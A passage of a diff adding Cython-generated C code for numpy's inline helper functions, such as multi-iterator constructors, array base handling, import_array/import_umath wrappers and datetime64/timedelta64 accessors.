PyArray_MultiIterNew(4, a, b, c, d) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew4", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":788 + * return PyArray_MultiIterNew(4, a, b, c, d) + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyArray_MultiIterNew5(PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d, PyObject *__pyx_v_e) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("PyArray_MultiIterNew5", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":789 + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): + * return PyArray_MultiIterNew(5, a, b, c, d, e) # <<<<<<<<<<<<<< + * + * cdef inline tuple PyDataType_SHAPE(dtype d): + */ + __Pyx_XDECREF(__pyx_r); + __pyx_t_1 = PyArray_MultiIterNew(5, ((void *)__pyx_v_a), ((void *)__pyx_v_b), ((void *)__pyx_v_c), ((void *)__pyx_v_d), ((void *)__pyx_v_e)); if (unlikely(!__pyx_t_1)) __PYX_ERR(2, 789, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":788 + * return PyArray_MultiIterNew(4, a, b, c, d) + * + * cdef inline object PyArray_MultiIterNew5(a, b, c, d, e): # <<<<<<<<<<<<<< + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_AddTraceback("numpy.PyArray_MultiIterNew5", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = 0; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":791 + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + * cdef inline tuple PyDataType_SHAPE(dtype d): # <<<<<<<<<<<<<< + * if PyDataType_HASSUBARRAY(d): + * return d.subarray.shape + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_PyDataType_SHAPE(PyArray_Descr *__pyx_v_d) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("PyDataType_SHAPE", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":792 + * + * cdef inline tuple PyDataType_SHAPE(dtype d): + * if PyDataType_HASSUBARRAY(d): # <<<<<<<<<<<<<< + * return d.subarray.shape + * else: + */ + __pyx_t_1 = PyDataType_HASSUBARRAY(__pyx_v_d); + if (__pyx_t_1) { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":793 + * cdef inline tuple PyDataType_SHAPE(dtype d): + * if PyDataType_HASSUBARRAY(d): + * return d.subarray.shape # <<<<<<<<<<<<<< + * else: + * return () + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(((PyObject*)__pyx_v_d->subarray->shape)); + __pyx_r = ((PyObject*)__pyx_v_d->subarray->shape); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":792 + * + * cdef inline tuple PyDataType_SHAPE(dtype d): + * if PyDataType_HASSUBARRAY(d): # <<<<<<<<<<<<<< + * return d.subarray.shape + * else: + */ + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":795 + * return d.subarray.shape + * else: + * return () # <<<<<<<<<<<<<< + * + * + */ + /*else*/ { + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(__pyx_empty_tuple); + __pyx_r = __pyx_empty_tuple; + goto __pyx_L0; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":791 + * return PyArray_MultiIterNew(5, a, b, c, d, e) + * + * cdef inline tuple PyDataType_SHAPE(dtype d): # <<<<<<<<<<<<<< + * if PyDataType_HASSUBARRAY(d): + * return d.subarray.shape + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":970 + * int _import_umath() except -1 + * + * cdef inline void set_array_base(ndarray arr, object base): # <<<<<<<<<<<<<< + * Py_INCREF(base) # important to do this before stealing the reference below! + * PyArray_SetBaseObject(arr, base) + */ + +static CYTHON_INLINE void __pyx_f_5numpy_set_array_base(PyArrayObject *__pyx_v_arr, PyObject *__pyx_v_base) { + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("set_array_base", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":971 + * + * cdef inline void set_array_base(ndarray arr, object base): + * Py_INCREF(base) # important to do this before stealing the reference below! # <<<<<<<<<<<<<< + * PyArray_SetBaseObject(arr, base) + * + */ + Py_INCREF(__pyx_v_base); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":972 + * cdef inline void set_array_base(ndarray arr, object base): + * Py_INCREF(base) # important to do this before stealing the reference below! + * PyArray_SetBaseObject(arr, base) # <<<<<<<<<<<<<< + * + * cdef inline object get_array_base(ndarray arr): + */ + (void)(PyArray_SetBaseObject(__pyx_v_arr, __pyx_v_base)); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":970 + * int _import_umath() except -1 + * + * cdef inline void set_array_base(ndarray arr, object base): # <<<<<<<<<<<<<< + * Py_INCREF(base) # important to do this before stealing the reference below! + * PyArray_SetBaseObject(arr, base) + */ + + /* function exit code */ + __Pyx_RefNannyFinishContext(); +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":974 + * PyArray_SetBaseObject(arr, base) + * + * cdef inline object get_array_base(ndarray arr): # <<<<<<<<<<<<<< + * base = PyArray_BASE(arr) + * if base is NULL: + */ + +static CYTHON_INLINE PyObject *__pyx_f_5numpy_get_array_base(PyArrayObject *__pyx_v_arr) { + PyObject *__pyx_v_base; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_t_1; + __Pyx_RefNannySetupContext("get_array_base", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":975 + * + * cdef inline object get_array_base(ndarray arr): + * base = PyArray_BASE(arr) # <<<<<<<<<<<<<< + * if base is NULL: + * return None + */ + __pyx_v_base = PyArray_BASE(__pyx_v_arr); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":976 + * cdef inline object get_array_base(ndarray arr): + * base = PyArray_BASE(arr) + * if base is NULL: # <<<<<<<<<<<<<< + * return None + * return base + */ + __pyx_t_1 = (__pyx_v_base == NULL); + if (__pyx_t_1) { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":977 + * base = PyArray_BASE(arr) + * if base is NULL: + * return None # <<<<<<<<<<<<<< + * return base + * + */ + __Pyx_XDECREF(__pyx_r); + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":976 + * cdef inline object get_array_base(ndarray arr): + * base = PyArray_BASE(arr) + * if base is NULL: # <<<<<<<<<<<<<< + * return None + * return base + */ + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":978 + * if base is NULL: + * return None + * return base # <<<<<<<<<<<<<< + * + * # Versions of the import_* functions which are more suitable for + */ + __Pyx_XDECREF(__pyx_r); + __Pyx_INCREF(((PyObject *)__pyx_v_base)); + __pyx_r = ((PyObject *)__pyx_v_base); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":974 + * PyArray_SetBaseObject(arr, base) + * + * cdef inline object get_array_base(ndarray arr): # <<<<<<<<<<<<<< + * base = PyArray_BASE(arr) + * if base is NULL: + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":982 + * # Versions of the import_* functions which are more suitable for + * # Cython code. + * cdef inline int import_array() except -1: # <<<<<<<<<<<<<< + * try: + * __pyx_import_array() + */ + +static CYTHON_INLINE int __pyx_f_5numpy_import_array(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("import_array", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":983 + * # Cython code. + * cdef inline int import_array() except -1: + * try: # <<<<<<<<<<<<<< + * __pyx_import_array() + * except Exception: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":984 + * cdef inline int import_array() except -1: + * try: + * __pyx_import_array() # <<<<<<<<<<<<<< + * except Exception: + * raise ImportError("numpy.core.multiarray failed to import") + */ + __pyx_t_4 = _import_array(); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(2, 984, __pyx_L3_error) + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":983 + * # Cython code. + * cdef inline int import_array() except -1: + * try: # <<<<<<<<<<<<<< + * __pyx_import_array() + * except Exception: + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L8_try_end; + __pyx_L3_error:; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":985 + * try: + * __pyx_import_array() + * except Exception: # <<<<<<<<<<<<<< + * raise ImportError("numpy.core.multiarray failed to import") + * + */ + __pyx_t_4 = __Pyx_PyErr_ExceptionMatches(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0]))); + if (__pyx_t_4) { + __Pyx_AddTraceback("numpy.import_array", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_6, &__pyx_t_7) < 0) __PYX_ERR(2, 985, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_7); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":986 + * __pyx_import_array() + * except Exception: + * raise ImportError("numpy.core.multiarray failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_umath() except -1: + */ + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ImportError, __pyx_tuple_, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(2, 986, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_Raise(__pyx_t_8, 0, 0, 0); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __PYX_ERR(2, 986, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":983 + * # Cython code. + * cdef inline int import_array() except -1: + * try: # <<<<<<<<<<<<<< + * __pyx_import_array() + * except Exception: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L8_try_end:; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":982 + * # Versions of the import_* functions which are more suitable for + * # Cython code. + * cdef inline int import_array() except -1: # <<<<<<<<<<<<<< + * try: + * __pyx_import_array() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("numpy.import_array", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":988 + * raise ImportError("numpy.core.multiarray failed to import") + * + * cdef inline int import_umath() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + +static CYTHON_INLINE int __pyx_f_5numpy_import_umath(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("import_umath", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":989 + * + * cdef inline int import_umath() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":990 + * cdef inline int import_umath() except -1: + * try: + * _import_umath() # <<<<<<<<<<<<<< + * except Exception: + * raise ImportError("numpy.core.umath failed to import") + */ + __pyx_t_4 = _import_umath(); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(2, 990, __pyx_L3_error) + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":989 + * + * cdef inline int import_umath() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L8_try_end; + __pyx_L3_error:; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":991 + * try: + * _import_umath() + * except Exception: # <<<<<<<<<<<<<< + * raise ImportError("numpy.core.umath failed to import") + * + */ + __pyx_t_4 = __Pyx_PyErr_ExceptionMatches(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0]))); + if (__pyx_t_4) { + __Pyx_AddTraceback("numpy.import_umath", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_6, &__pyx_t_7) < 0) __PYX_ERR(2, 991, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_7); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":992 + * _import_umath() + * except Exception: + * raise ImportError("numpy.core.umath failed to import") # <<<<<<<<<<<<<< + * + * cdef inline int import_ufunc() except -1: + */ + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ImportError, __pyx_tuple__2, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(2, 992, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_Raise(__pyx_t_8, 0, 0, 0); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __PYX_ERR(2, 992, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":989 + * + * cdef inline int import_umath() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L8_try_end:; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":988 + * raise ImportError("numpy.core.multiarray failed to import") + * + * cdef inline int import_umath() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("numpy.import_umath", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":994 + * raise ImportError("numpy.core.umath failed to import") + * + * cdef inline int import_ufunc() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + +static CYTHON_INLINE int __pyx_f_5numpy_import_ufunc(void) { + int __pyx_r; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + PyObject *__pyx_t_5 = NULL; + PyObject *__pyx_t_6 = NULL; + PyObject *__pyx_t_7 = NULL; + PyObject *__pyx_t_8 = NULL; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("import_ufunc", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":995 + * + * cdef inline int import_ufunc() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + { + __Pyx_PyThreadState_declare + __Pyx_PyThreadState_assign + __Pyx_ExceptionSave(&__pyx_t_1, &__pyx_t_2, &__pyx_t_3); + __Pyx_XGOTREF(__pyx_t_1); + __Pyx_XGOTREF(__pyx_t_2); + __Pyx_XGOTREF(__pyx_t_3); + /*try:*/ { + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":996 + * cdef inline int import_ufunc() except -1: + * try: + * _import_umath() # <<<<<<<<<<<<<< + * except Exception: + * raise ImportError("numpy.core.umath failed to import") + */ + __pyx_t_4 = _import_umath(); if (unlikely(__pyx_t_4 == ((int)-1))) __PYX_ERR(2, 996, __pyx_L3_error) + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":995 + * + * cdef inline int import_ufunc() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + } + __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; + goto __pyx_L8_try_end; + __pyx_L3_error:; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":997 + * try: + * _import_umath() + * except Exception: # <<<<<<<<<<<<<< + * raise ImportError("numpy.core.umath failed to import") + * + */ + __pyx_t_4 = __Pyx_PyErr_ExceptionMatches(((PyObject *)(&((PyTypeObject*)PyExc_Exception)[0]))); + if (__pyx_t_4) { + __Pyx_AddTraceback("numpy.import_ufunc", __pyx_clineno, __pyx_lineno, __pyx_filename); + if (__Pyx_GetException(&__pyx_t_5, &__pyx_t_6, &__pyx_t_7) < 0) __PYX_ERR(2, 997, __pyx_L5_except_error) + __Pyx_XGOTREF(__pyx_t_5); + __Pyx_XGOTREF(__pyx_t_6); + __Pyx_XGOTREF(__pyx_t_7); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":998 + * _import_umath() + * except Exception: + * raise ImportError("numpy.core.umath failed to import") # <<<<<<<<<<<<<< + * + * + */ + __pyx_t_8 = __Pyx_PyObject_Call(__pyx_builtin_ImportError, __pyx_tuple__2, NULL); if (unlikely(!__pyx_t_8)) __PYX_ERR(2, 998, __pyx_L5_except_error) + __Pyx_GOTREF(__pyx_t_8); + __Pyx_Raise(__pyx_t_8, 0, 0, 0); + __Pyx_DECREF(__pyx_t_8); __pyx_t_8 = 0; + __PYX_ERR(2, 998, __pyx_L5_except_error) + } + goto __pyx_L5_except_error; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":995 + * + * cdef inline int import_ufunc() except -1: + * try: # <<<<<<<<<<<<<< + * _import_umath() + * except Exception: + */ + __pyx_L5_except_error:; + __Pyx_XGIVEREF(__pyx_t_1); + __Pyx_XGIVEREF(__pyx_t_2); + __Pyx_XGIVEREF(__pyx_t_3); + __Pyx_ExceptionReset(__pyx_t_1, __pyx_t_2, __pyx_t_3); + goto __pyx_L1_error; + __pyx_L8_try_end:; + } + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":994 + * raise ImportError("numpy.core.umath failed to import") + * + * cdef inline int import_ufunc() except -1: # <<<<<<<<<<<<<< + * try: + * _import_umath() + */ + + /* function exit code */ + __pyx_r = 0; + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_5); + __Pyx_XDECREF(__pyx_t_6); + __Pyx_XDECREF(__pyx_t_7); + __Pyx_XDECREF(__pyx_t_8); + __Pyx_AddTraceback("numpy.import_ufunc", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = -1; + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1001 + * + * + * cdef inline bint is_timedelta64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.timedelta64)` + */ + +static CYTHON_INLINE int __pyx_f_5numpy_is_timedelta64_object(PyObject *__pyx_v_obj) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_timedelta64_object", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1013 + * bool + * """ + * return PyObject_TypeCheck(obj, &PyTimedeltaArrType_Type) # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = PyObject_TypeCheck(__pyx_v_obj, (&PyTimedeltaArrType_Type)); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1001 + * + * + * cdef inline bint is_timedelta64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.timedelta64)` + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1016 + * + * + * cdef inline bint is_datetime64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.datetime64)` + */ + +static CYTHON_INLINE int __pyx_f_5numpy_is_datetime64_object(PyObject *__pyx_v_obj) { + int __pyx_r; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("is_datetime64_object", 0); + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1028 + * bool + * """ + * return PyObject_TypeCheck(obj, &PyDatetimeArrType_Type) # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = PyObject_TypeCheck(__pyx_v_obj, (&PyDatetimeArrType_Type)); + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1016 + * + * + * cdef inline bint is_datetime64_object(object obj): # <<<<<<<<<<<<<< + * """ + * Cython equivalent of `isinstance(obj, np.datetime64)` + */ + + /* function exit code */ + __pyx_L0:; + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1031 + * + * + * cdef inline npy_datetime get_datetime64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy datetime64 object + */ + +static CYTHON_INLINE npy_datetime __pyx_f_5numpy_get_datetime64_value(PyObject *__pyx_v_obj) { + npy_datetime __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1038 + * also needed. That can be found using `get_datetime64_unit`. + * """ + * return (obj).obval # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = ((PyDatetimeScalarObject *)__pyx_v_obj)->obval; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1031 + * + * + * cdef inline npy_datetime get_datetime64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy datetime64 object + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1041 + * + * + * cdef inline npy_timedelta get_timedelta64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy timedelta64 object + */ + +static CYTHON_INLINE npy_timedelta __pyx_f_5numpy_get_timedelta64_value(PyObject *__pyx_v_obj) { + npy_timedelta __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1045 + * returns the int64 value underlying scalar numpy timedelta64 object + * """ + * return (obj).obval # <<<<<<<<<<<<<< + * + * + */ + __pyx_r = ((PyTimedeltaScalarObject *)__pyx_v_obj)->obval; + goto __pyx_L0; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1041 + * + * + * cdef inline npy_timedelta get_timedelta64_value(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the int64 value underlying scalar numpy timedelta64 object + */ + + /* function exit code */ + __pyx_L0:; + return __pyx_r; +} + +/* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1048 + * + * + * cdef inline NPY_DATETIMEUNIT get_datetime64_unit(object obj) nogil: # <<<<<<<<<<<<<< + * """ + * returns the unit part of the dtype for a numpy datetime64 object. + */ + +static CYTHON_INLINE NPY_DATETIMEUNIT __pyx_f_5numpy_get_datetime64_unit(PyObject *__pyx_v_obj) { + NPY_DATETIMEUNIT __pyx_r; + + /* "../../usr/local/pyenv/versions/3.11.4/lib/python3.11/site-packages/numpy/__init__.cython-30.pxd":1052 